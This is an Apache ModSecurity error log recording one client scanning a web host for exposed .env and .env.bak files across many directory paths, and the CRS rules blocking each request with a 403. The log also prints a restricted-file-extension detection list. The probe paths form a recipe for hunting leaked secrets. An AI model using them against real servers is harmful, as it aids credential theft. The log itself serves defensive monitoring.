[Mon Jan 26 21:25:39.405097 2026] [:error] [pid 1675796] [client 45.148.10.143:46978] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /node_modules/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/node_modules/.env"] [unique_id "aXfNwzR_nqoE8uOg2bsmXwAAABA"]
[Mon Jan 26 21:25:39.405323 2026] [:error] [pid 1675796] [client 45.148.10.143:46978] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/node_modules/.env"] [unique_id "aXfNwzR_nqoE8uOg2bsmXwAAABA"]
[Mon Jan 26 21:25:39.405486 2026] [:error] [pid 1675796] [client 45.148.10.143:46978] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/node_modules/.env"] [unique_id "aXfNwzR_nqoE8uOg2bsmXwAAABA"]
[Mon Jan 26 21:25:40.021907 2026] [:error] [pid 1675796] [client 45.148.10.143:46978] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /kyc/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/kyc/.env"] [unique_id "aXfNxDR_nqoE8uOg2bsmYAAAABA"]
[Mon Jan 26 21:25:40.022129 2026] [:error] [pid 1675796] [client 45.148.10.143:46978] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/kyc/.env"] [unique_id "aXfNxDR_nqoE8uOg2bsmYAAAABA"]
[Mon Jan 26 21:25:40.022307 2026] [:error] [pid 1675796] [client 45.148.10.143:46978] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/kyc/.env"] [unique_id "aXfNxDR_nqoE8uOg2bsmYAAAABA"]
[Mon Jan 26 21:25:55.631667 2026] [:error] [pid 1675795] [client 45.148.10.143:57958] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aXfN08oFpPNqzjNngInAcAAAAA4"]
[Mon Jan 26 21:25:55.631911 2026] [:error] [pid 1675795] [client 45.148.10.143:57958] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aXfN08oFpPNqzjNngInAcAAAAA4"]
[Mon Jan 26 21:25:55.632070 2026] [:error] [pid 1675795] [client 45.148.10.143:57958] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aXfN08oFpPNqzjNngInAcAAAAA4"]
[Mon Jan 26 21:26:06.219264 2026] [:error] [pid 1677409] [client 45.148.10.143:34828] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aXfN3p940sjFbKiNzmHyzQAAAAA"]
[Mon Jan 26 21:26:06.219482 2026] [:error] [pid 1677409] [client 45.148.10.143:34828] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aXfN3p940sjFbKiNzmHyzQAAAAA"]
[Mon Jan 26 21:26:06.219643 2026] [:error] [pid 1677409] [client 45.148.10.143:34828] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aXfN3p940sjFbKiNzmHyzQAAAAA"]
[Mon Jan 26 21:26:17.764125 2026] [:error] [pid 1677415] [client 45.148.10.143:43784] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /prod/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/prod/.env"] [unique_id "aXfN6burDkJrBY-m6DzdEQAAAA8"]
[Mon Jan 26 21:26:17.764367 2026] [:error] [pid 1677415] [client 45.148.10.143:43784] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/prod/.env"] [unique_id "aXfN6burDkJrBY-m6DzdEQAAAA8"]
[Mon Jan 26 21:26:17.764525 2026] [:error] [pid 1677415] [client 45.148.10.143:43784] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/prod/.env"] [unique_id "aXfN6burDkJrBY-m6DzdEQAAAA8"]
[Mon Jan 26 21:26:20.210982 2026] [:error] [pid 1675794] [client 45.148.10.143:43800] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /prod/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/prod/.env"] [unique_id "aXfN7Dsp5zRKVOBo1RPARwAAAA0"]
[Mon Jan 26 21:26:20.211205 2026] [:error] [pid 1675794] [client 45.148.10.143:43800] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/prod/.env"] [unique_id "aXfN7Dsp5zRKVOBo1RPARwAAAA0"]
[Mon Jan 26 21:26:20.211368 2026] [:error] [pid 1675794] [client 45.148.10.143:43800] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/prod/.env"] [unique_id "aXfN7Dsp5zRKVOBo1RPARwAAAA0"]
[Mon Jan 26 21:26:20.235439 2026] [:error] [pid 1675794] [client 45.148.10.143:43800] [client 45.148.10.143] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aXfN7Dsp5zRKVOBo1RPASAAAAA0"]
[Mon Jan 26 21:26:20.235544 2026] [:error] [pid 1675794] [client 45.148.10.143:43800] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aXfN7Dsp5zRKVOBo1RPASAAAAA0"]
[Mon Jan 26 21:26:20.235752 2026] [:error] [pid 1675794] [client 45.148.10.143:43800] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aXfN7Dsp5zRKVOBo1RPASAAAAA0"]
[Mon Jan 26 21:26:20.235906 2026] [:error] [pid 1675794] [client 45.148.10.143:43800] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aXfN7Dsp5zRKVOBo1RPASAAAAA0"]
[Mon Jan 26 21:26:20.362624 2026] [:error] [pid 1675794] [client 45.148.10.143:43800] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /website/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/website/.env"] [unique_id "aXfN7Dsp5zRKVOBo1RPATAAAAA0"]
[Mon Jan 26 21:26:20.362867 2026] [:error] [pid 1675794] [client 45.148.10.143:43800] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/website/.env"] [unique_id "aXfN7Dsp5zRKVOBo1RPATAAAAA0"]
[Mon Jan 26 21:26:20.363071 2026] [:error] [pid 1675794] [client 45.148.10.143:43800] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/website/.env"] [unique_id "aXfN7Dsp5zRKVOBo1RPATAAAAA0"]
[Mon Jan 26 21:26:20.389240 2026] [:error] [pid 1675794] [client 45.148.10.143:43800] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /development/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/development/.env"] [unique_id "aXfN7Dsp5zRKVOBo1RPATQAAAA0"]
[Mon Jan 26 21:26:20.389446 2026] [:error] [pid 1675794] [client 45.148.10.143:43800] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/development/.env"] [unique_id "aXfN7Dsp5zRKVOBo1RPATQAAAA0"]
[Mon Jan 26 21:26:20.389604 2026] [:error] [pid 1675794] [client 45.148.10.143:43800] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/development/.env"] [unique_id "aXfN7Dsp5zRKVOBo1RPATQAAAA0"]
[Mon Jan 26 21:26:20.419790 2026] [:error] [pid 1675794] [client 45.148.10.143:43800] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aXfN7Dsp5zRKVOBo1RPATgAAAA0"]
[Mon Jan 26 21:26:20.420008 2026] [:error] [pid 1675794] [client 45.148.10.143:43800] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aXfN7Dsp5zRKVOBo1RPATgAAAA0"]
[Mon Jan 26 21:26:20.420175 2026] [:error] [pid 1675794] [client 45.148.10.143:43800] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aXfN7Dsp5zRKVOBo1RPATgAAAA0"]
[Mon Jan 26 21:26:20.445056 2026] [:error] [pid 1675794] [client 45.148.10.143:43800] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/shared/config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/shared/config/.env"] [unique_id "aXfN7Dsp5zRKVOBo1RPATwAAAA0"]
[Mon Jan 26 21:26:20.445232 2026] [:error] [pid 1675794] [client 45.148.10.143:43800] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/shared/config/.env"] [unique_id "aXfN7Dsp5zRKVOBo1RPATwAAAA0"]
[Mon Jan 26 21:26:20.445381 2026] [:error] [pid 1675794] [client 45.148.10.143:43800] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/shared/config/.env"] [unique_id "aXfN7Dsp5zRKVOBo1RPATwAAAA0"]
[Mon Jan 26 21:26:23.639639 2026] [:error] [pid 1670849] [client 45.148.10.143:38122] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/shared/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/shared/.env"] [unique_id "aXfN79W4MBlSxe-QA34lewAAAAk"]
[Mon Jan 26 21:26:23.639875 2026] [:error] [pid 1670849] [client 45.148.10.143:38122] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/shared/.env"] [unique_id "aXfN79W4MBlSxe-QA34lewAAAAk"]
[Mon Jan 26 21:26:23.640062 2026] [:error] [pid 1670849] [client 45.148.10.143:38122] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/shared/.env"] [unique_id "aXfN79W4MBlSxe-QA34lewAAAAk"]
[Mon Jan 26 21:26:28.444911 2026] [:error] [pid 1664894] [client 45.148.10.143:38134] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/shared/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/shared/.env"] [unique_id "aXfN9IlnPSpEvTj8B1BMzwAAAAg"]
[Mon Jan 26 21:26:28.445146 2026] [:error] [pid 1664894] [client 45.148.10.143:38134] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/shared/.env"] [unique_id "aXfN9IlnPSpEvTj8B1BMzwAAAAg"]
